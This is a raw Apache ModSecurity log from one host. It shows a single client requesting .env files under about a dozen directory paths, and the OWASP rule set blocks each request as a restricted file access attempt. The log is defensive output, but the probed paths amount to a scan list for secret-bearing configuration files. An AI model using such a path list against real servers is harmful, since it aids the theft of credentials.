[Mon May 11 15:50:13.782742 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHelat2WtvoFr7xvGzcvAAAAIk"]
[Mon May 11 15:50:13.783236 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHelat2WtvoFr7xvGzcvAAAAIk"]
[Mon May 11 15:50:13.783456 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agHelat2WtvoFr7xvGzcvAAAAIk"]
[Mon May 11 15:50:13.877915 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHelat2WtvoFr7xvGzcvQAAAIk"]
[Mon May 11 15:50:13.878411 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHelat2WtvoFr7xvGzcvQAAAIk"]
[Mon May 11 15:50:13.878656 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agHelat2WtvoFr7xvGzcvQAAAIk"]
[Mon May 11 15:50:13.971980 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHelat2WtvoFr7xvGzcvgAAAIk"]
[Mon May 11 15:50:13.972495 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHelat2WtvoFr7xvGzcvgAAAIk"]
[Mon May 11 15:50:13.972737 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/scripts/.env"] [unique_id "agHelat2WtvoFr7xvGzcvgAAAIk"]
[Mon May 11 15:50:14.067533 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcvwAAAIk"]
[Mon May 11 15:50:14.068023 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcvwAAAIk"]
[Mon May 11 15:50:14.068286 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcvwAAAIk"]
[Mon May 11 15:50:14.159966 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwAAAAIk"]
[Mon May 11 15:50:14.160468 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwAAAAIk"]
[Mon May 11 15:50:14.160705 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sbin/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwAAAAIk"]
[Mon May 11 15:50:14.252281 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwQAAAIk"]
[Mon May 11 15:50:14.252766 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwQAAAIk"]
[Mon May 11 15:50:14.252983 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwQAAAIk"]
[Mon May 11 15:50:14.345294 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwgAAAIk"]
[Mon May 11 15:50:14.345706 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwgAAAIk"]
[Mon May 11 15:50:14.345895 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwgAAAIk"]
[Mon May 11 15:50:14.438058 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwwAAAIk"]
[Mon May 11 15:50:14.438479 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwwAAAIk"]
[Mon May 11 15:50:14.438666 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHelqt2WtvoFr7xvGzcwwAAAIk"]
[Mon May 11 15:50:14.530432 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxAAAAIk"]
[Mon May 11 15:50:14.530920 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxAAAAIk"]
[Mon May 11 15:50:14.531194 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxAAAAIk"]
[Mon May 11 15:50:14.622870 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxQAAAIk"]
[Mon May 11 15:50:14.623344 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxQAAAIk"]
[Mon May 11 15:50:14.623579 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxQAAAIk"]
[Mon May 11 15:50:14.715281 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxwAAAIk"]
[Mon May 11 15:50:14.715758 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxwAAAIk"]
[Mon May 11 15:50:14.715992 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHelqt2WtvoFr7xvGzcxwAAAIk"]
[Mon May 11 15:50:14.812653 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyAAAAIk"]
[Mon May 11 15:50:14.813129 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyAAAAIk"]
[Mon May 11 15:50:14.813401 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyAAAAIk"]
[Mon May 11 15:50:14.906332 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyQAAAIk"]
[Mon May 11 15:50:14.906788 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyQAAAIk"]
[Mon May 11 15:50:14.907017 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHelqt2WtvoFr7xvGzcyQAAAIk"]
